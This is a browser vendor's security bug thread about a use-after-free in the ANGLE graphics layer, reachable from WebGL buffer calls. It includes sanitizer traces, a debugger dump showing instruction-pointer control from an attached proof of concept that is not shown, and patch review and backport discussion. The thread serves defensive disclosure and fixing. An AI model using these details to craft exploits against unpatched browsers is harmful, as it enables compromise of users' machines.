BUCKET_ID:  FATAL_APP_EXIT_ucrtbase!abort+4e

PRIMARY_PROBLEM_CLASS:  FATAL_APP_EXIT_ucrtbase!abort+4e

FAILURE_PROBLEM_CLASS:  FATAL_APP_EXIT

FAILURE_EXCEPTION_CODE:  c0000409

FAILURE_IMAGE_NAME:  ucrtbase.dll

FAILURE_FUNCTION_NAME:  abort

FAILURE_SYMBOL_NAME:  ucrtbase.dll!abort

FAILURE_BUCKET_ID:  FATAL_APP_EXIT_c0000409_ucrtbase.dll!abort

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:fatal_app_exit_c0000409_ucrtbase.dll!abort

FAILURE_ID_HASH:  {f324e349-b0b7-1f0f-a2b4-a992c83e193a}

Followup:     MachineOwner
(In reply to Milan Sreckovic [:milan] from comment #15)
> Daniel, this is a bug in ANGLE, so possibly reproducible in Chrome as well. 
> Either way, can you help opening a Chrome security bug and maybe CC one of
> their security people on this bug, or we can copy the details?

I can reproduce it with the exact same test case in Google Chrome. shall I report it to google?


=================================================================
==16136==ERROR: AddressSanitizer: heap-use-after-free on address 0x21013e40 at pc 0x0892d9dc bp 0x00cfcb5c sp 0x00cfcb50
READ of size 4 at 0x21013e40 thread T0
==16136==WARNING: Failed to use and restart external symbolizer!
==16136==*** WARNING: Failed to initialize DbgHelp!              ***
==16136==*** Most likely this means that the app is already      ***
==16136==*** using DbgHelp, possibly with incompatible flags.    ***
==16136==*** Due to technical reasons, symbolization might crash ***
==16136==*** or produce wrong results.                           ***
    #0 0x892d9db in rx::Buffer11::updateBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:807
    #1 0x8921254 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:695
    #2 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
    #3 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
    #4 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
    #5 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
    #6 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
    #7 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
    #8 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
    #9 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
    #10 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
    #11 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
    #12 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
    #13 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
    #14 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
    #15 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
    #16 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
    #17 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
    #18 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
    #19 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
    #20 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #21 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #22 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
    #23 0x1340a436 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:515
    #24 0x13560c3a in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:33
    #25 0x13407349 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
    #26 0x134863cd in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:37
    #27 0x15a59482 in content::GpuMain C:\b\c\b\win_asan_release\src\content\gpu\gpu_main.cc:303
    #28 0x1329a477 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:416
    #29 0x1329bb14 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:793
    #30 0x1329a050 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:20
    #31 0xfeb11fe in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:112
    #32 0xb7b77 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:173
    #33 0xb1943 in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:248
    #34 0x2c609d in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:253
    #35 0x76d638f3 in BaseThreadInitThunk+0x23 (C:\WINDOWS\SYSTEM32\KERNEL32.DLL+0x6b8138f3)
    #36 0x77cc5de2 in RtlUnicodeStringToInteger+0x252 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x4b2e5de2)
    #37 0x77cc5dad in RtlUnicodeStringToInteger+0x21d (C:\WINDOWS\SYSTEM32\ntdll.dll+0x4b2e5dad)

0x21013e40 is located 0 bytes inside of 28-byte region [0x21013e40,0x21013e5c)
freed by thread T0 here:
    #0 0x2acc58 in free e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44
    #1 0x89315a0 in rx::Buffer11::SystemMemoryStorage::~SystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:253
    #2 0x8926261 in rx::Buffer11::checkForDeallocation C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:552
    #3 0x89266ce in rx::Buffer11::markBufferUsage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:580
    #4 0x892139c in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:696
    #5 0x892299e in rx::Buffer11::getStagingStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:847
    #6 0x892d34f in rx::Buffer11::updateBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:795
    #7 0x8921254 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:695
    #8 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
    #9 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
    #10 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
    #11 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
    #12 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
    #13 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
    #14 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
    #15 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
    #16 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
    #17 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
    #18 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
    #19 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
    #20 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
    #21 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
    #22 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
    #23 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
    #24 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
    #25 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
    #26 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #27 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #28 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422

previously allocated by thread T0 here:
    #0 0x2acd3c in malloc e:\b\build\slave\win_upload_clang\build\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:65
    #1 0x8c829d8 in operator new f:\dd\vctools\crt\vcstartup\src\heap\new_scalar.cpp:19
    #2 0x892c5f0 in rx::Buffer11::allocateStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:709
    #3 0x8921062 in rx::Buffer11::getBufferStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:686
    #4 0x8920bf8 in rx::Buffer11::getSystemMemoryStorage C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:323
    #5 0x8921c98 in rx::Buffer11::setSubData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:360
    #6 0x89205fa in rx::Buffer11::setData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:305
    #7 0x8716ffa in gl::Buffer::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Buffer.cpp:57
    #8 0x85e17de in gl::Context::bufferData C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\Context.cpp:3568
    #9 0x1a947c33 in gpu::gles2::BufferManager::DoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:463
    #10 0x1a9476a7 in gpu::gles2::BufferManager::ValidateAndDoBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\buffer_manager.cc:431
    #11 0x1c4bb499 in gpu::gles2::GLES2DecoderImpl::HandleBufferData C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:12316
    #12 0x1c52e219 in gpu::gles2::GLES2DecoderImpl::DoCommandsImpl<0> C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\gles2_cmd_decoder.cc:5204
    #13 0x1a966da7 in gpu::CommandParser::ProcessCommands C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\cmd_parser.cc:53
    #14 0x1c5918f5 in gpu::CommandExecutor::PutChanged C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_executor.cc:61
    #15 0x1c4b73de in gpu::CommandBufferService::Flush C:\b\c\b\win_asan_release\src\gpu\command_buffer\service\command_buffer_service.cc:98
    #16 0x1acfb725 in gpu::GpuCommandBufferStub::OnAsyncFlush C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:829
    #17 0x1acfb160 in IPC::MessageT<GpuCommandBufferMsg_AsyncFlush_Meta,std::tuple<int,unsigned int,std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > >,void>::Dispatch<gpu::GpuCommandBufferStub,gpu::GpuCommandBufferStub,void,void (gpu::GpuCommandBufferStub::*)(int, unsigned int, const std::vector<ui::LatencyInfo,std::allocator<ui::LatencyInfo> > &) __attribute__((thiscall))> C:\b\c\b\win_asan_release\src\ipc\ipc_message_templates.h:120
    #18 0x1acf696f in gpu::GpuCommandBufferStub::OnMessageReceived C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_command_buffer_stub.cc:244
    #19 0x1ace55c0 in gpu::GpuChannel::HandleMessageHelper C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:802
    #20 0x1ace5379 in gpu::GpuChannel::HandleMessage C:\b\c\b\win_asan_release\src\gpu\ipc\service\gpu_channel.cc:782
    #21 0x1acec3ca in base::internal::Invoker<base::internal::BindState<void (gpu::GpuChannel::*)(const scoped_refptr<gpu::GpuChannelMessageQueue> &) __attribute__((thiscall)),base::WeakPtr<gpu::GpuChannel>,scoped_refptr<gpu::GpuChannelMessageQueue> >,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:340
    #22 0x1355a645 in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:50
    #23 0x134082df in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:413
    #24 0x13409126 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:422
    #25 0x1340a436 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:515
    #26 0x13560c3a in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:33
    #27 0x13407349 in base::MessageLoop::RunHandler C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:378
    #28 0x134863cd in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:37

SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\angle\src\libANGLE\renderer\d3d\d3d11\Buffer11.cpp:807 in rx::Buffer11::updateBufferStorage
Shadow bytes around the buggy address:
  0x34202770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x34202780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x34202790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x342027a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x342027b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x342027c0: fa fa fa fa fa fa fa fa[fd]fd fd fd fa fa fd fd
  0x342027d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x342027e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x342027f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x34202800: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x34202810: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==16136==ABORTING
Flags: needinfo?(loobenyang)
Reported to google: https://bugs.chromium.org/p/chromium/issues/detail?id=682020

Thanks for the quick fix Milan, please let me know if there is anything else I can help.
(In reply to Looben Yang from comment #19)
> Reported to google:
> https://bugs.chromium.org/p/chromium/issues/detail?id=682020
> 
> Thanks for the quick fix Milan, please let me know if there is anything else
> I can help.

Thanks.  You can put a note in the chromium bug with my e-mail in that bug if they want to know the results of our investigation and our current fix/workaround?
Something similar was originally tracked as bug 1248276, but it was never identified as security and we didn't get far with it, other than "ANGLE update solves it".  Which it clearly didn't :)
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

While we're waiting for ANGLE team to respond, lets see if it makes sense to land this.  Morris, you've looked at bug 1248276, can you take a look at this bug and this patch?
Attachment #8827288 - Flags: review?(mtseng)
Attachment #8827288 - Flags: review?(mtseng) → review+
(In reply to Milan Sreckovic [:milan] from comment #20)
> (In reply to Looben Yang from comment #19)
> > Reported to google:
> > https://bugs.chromium.org/p/chromium/issues/detail?id=682020
> > 
> > Thanks for the quick fix Milan, please let me know if there is anything else
> > I can help.
> 
> Thanks.  You can put a note in the chromium bug with my e-mail in that bug
> if they want to know the results of our investigation and our current
> fix/workaround?
Done.
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

[Security approval request comment]
How easily could an exploit be constructed based on the patch? Not easily, just based on the patch.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?  Not really.

Which older supported branches are affected by this flaw?  Likely.  This is a problem in ANGLE, but it isn't clear that a particular version introduced it.

If not all supported branches, which bug introduced the flaw?

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
The ports are trivial.

How likely is this patch to cause regressions; how much testing does it need?  There would be a temporary increase in memory usage, but, I believe, only in the cases where deleting that memory would lead to UAF, so that's OK.
Attachment #8827288 - Flags: sec-approval?
This appears to be a ~50 crashes per day case (see bug 1248276.)
Assignee: nobody → milan
sec-approval for checkin on February 7, two weeks into the new cycle. 

I'm going to assume this affects 52 and higher. I would like to know if this affects ESR45.
Whiteboard: [checkin on 2/7]
Attachment #8827288 - Flags: sec-approval? → sec-approval+
A new POC UAF_updateBufferStorage_POC_EIP_41414141.html is attached to illustrate the clear exploitability of this bug by controlling the EIP register.

Firefox version: 53.0a1 (2017-01-21) (32-bit)
OS: Windows 10 64 bit


(114fc.1b754): Access violation - code c0000005 (!!! second chance !!!)
eax=e5e5e5e5 ebx=244312e0 ecx=244312e0 edx=00000000 esi=227f03d0 edi=227f03d0
eip=41414141 esp=00ffdd28 ebp=00ffdd60 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???



00ffdd4c 227f03d0 00000000 0x41414141
00ffdd84 244312e0 00000000 libGLESv2!rx::Buffer11::updateBufferStorage+0xde
00ffdda8 00000000 17264c80 libGLESv2!rx::Buffer11::getBufferStorage+0x85
00ffddd8 00000000 17264c80 libGLESv2!rx::Buffer11::getSystemMemoryStorage+0x13
00ffde10 00008892 18258000 libGLESv2!rx::Buffer11::setSubData+0x94
00ffde44 00008892 18258000 libGLESv2!rx::Buffer11::setData+0x29
-------- -------- -------- libGLESv2!gl::Buffer::bufferData+0x1b
00008892 00000877 18258000 libGLESv2!gl::Context::bufferData+0x34
00008892 00000877 18258000 libGLESv2!gl::BufferData+0x40
-------- -------- -------- xul!mozilla::gl::GLContext::raw_fBufferData+0x16
00008892 00000877 18258000 xul!mozilla::gl::GLContext::fBufferData+0x1a
00008892 00000877 18258000 xul!mozilla::WebGLBuffer::BufferData+0xc3
00008892 00000877 18258000 xul!mozilla::WebGLContext::BufferDataImpl+0x48
00008892 00000877 00000000 xul!mozilla::WebGLContext::BufferData+0x82
1373d000 00ffe024 15fe9c00 xul!mozilla::dom::WebGL2RenderingContextBinding::bufferData+0x29c
1373d000 00000003 15fe9c00 xul!mozilla::dom::GenericBindingMethod+0xc2
-------- -------- -------- xul!js::CallJSNative+0xe9
00000000 1373d000 00000000 xul!js::InternalCallOrConstruct+0x4b4
1373d000 00006000 23d44038 xul!InternalCall+0xa8
00ffead8 00ffead8 00ffead8 xul!Interpret+0x5f7e
https://hg.mozilla.org/mozilla-central/rev/9a103b890855
Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla54
Jeff, can you track this and make sure it survives our next ANGLE update, or that it shows up in the upstream build. Whether it's this particular change or the equivalent.
Flags: needinfo?(jgilbert)
Milan, can you request uplift for this? Thanks!
Flags: needinfo?(milan)
Flags: needinfo?(milan)
See Also: → 1248276
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

Approval Request Comment
[Feature/Bug causing the regression]:
[User impact if declined]: UAF, sec-high
[Is this code covered by automated tests?]: No
[Has the fix been verified in Nightly?]: Yes
[Needs manual test from QE? If yes, steps to reproduce]: 
[List of other uplifts needed for the feature/fix]:
[Is the change risky?]: Not risky as a change, but until we get a confirmation from Chrome, it may not be the fix they would have chosen.  This is the simplest one.
[Why is the change risky/not risky?]:
[String changes made/needed]:
Attachment #8827288 - Flags: approval-mozilla-beta?
Attachment #8827288 - Flags: approval-mozilla-aurora?
Group: gfx-core-security → core-security-release
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

avoid uaf in angle, aurora53+, beta52+
Attachment #8827288 - Flags: approval-mozilla-beta?
Attachment #8827288 - Flags: approval-mozilla-beta+
Attachment #8827288 - Flags: approval-mozilla-aurora?
Attachment #8827288 - Flags: approval-mozilla-aurora+
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

See comment 32.
Attachment #8827288 - Flags: approval-mozilla-esr45?
Comment on attachment 8827288 [details] [diff] [review]
Speculative, mark as used earlier.

Fix a sec-high. ESR45+.
Attachment #8827288 - Flags: approval-mozilla-esr45? → approval-mozilla-esr45+
Flagging this for verification, instructions in Comment 0.
Flags: qe-verify+
This needs a rebased patch for ESR45.
Flags: needinfo?(milan)
I don't know that this applies to ESR45; it may have been a more recent change in ANGLE that broke this.
Flags: needinfo?(milan)
Attachment #8831423 - Attachment mime type: text/plain → text/html
I can reproduce the crashes on a Win10 machine with a GeForce GTX 1060 graphics card.
Original testcase crash report UAF: bp-901cff05-ce78-4c6c-a092-748c12170214
The EIP control crash: bp-0324a1dd-0922-42e3-8ae2-823f42170214
Sorry if that alarmed anyone: I reproduced using the same 53.0a1 2016-12-22 nightly the reporter originally used. Using yesterday's 53 Aurora or the current 52 Beta 5 I could no longer reproduce. Appears to be fixed.
I was not able to reproduce on a Win7 laptop with a NVIDIA Quadra 1000M graphics card.
(In reply to Milan Sreckovic [:milan] from comment #39)
> I don't know that this applies to ESR45; it may have been a more recent
> change in ANGLE that broke this.

On the same machine as in comment 40 and 41 I cannot reproduce on ESR 45.7
Flags: sec-bounty? → sec-bounty+
I was unable to reproduce this crash on our Windows test machines using AMD GPUs. I tried 52.0a2-win32 (20161222004019) with ATI Radeon 3000, AMD Radeon R7 200 and NVIDIA GeForce 210 -- no success.

Removing qe-verify+ since there's nothing else I can do here to help. If there's someone else that could verify this on Beta 52 at least, that would be great.
Flags: qe-verify+
Whiteboard: [post-critsmash-triage]
Whiteboard: [post-critsmash-triage] → [post-critsmash-triage][adv-main52+]
Alias: CVE-2017-5411
(In reply to Jeff Gilbert [:jgilbert] from comment #46)
> Fixed upstream:
> https://github.com/google/angle/commit/
> c1a5d16e964ad524487eac9d2e4b5a65d837ff27

Our fix is not their fix. we set "mIdleness[usage] = 0;" in one place, they do it in two. (and the one place we do it is after the newStorage->resize() instead of before, but shouldn't matter if that's a simple reallocation as it sounds -- but maybe it does matter)

Looks like bug 1328762 was basically a dupe of this bug, but now shows that crashes were still happening in nightlies a couple of months after our fix was checked in.
Flags: needinfo?(jgilbert)
See Also: → CVE-2017-5031
We thought we were fine before. I remember our fix being fine. Feel free to double-check though.
Flags: in-testsuite? → in-testsuite-
Flags: needinfo?(jgilbert)
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.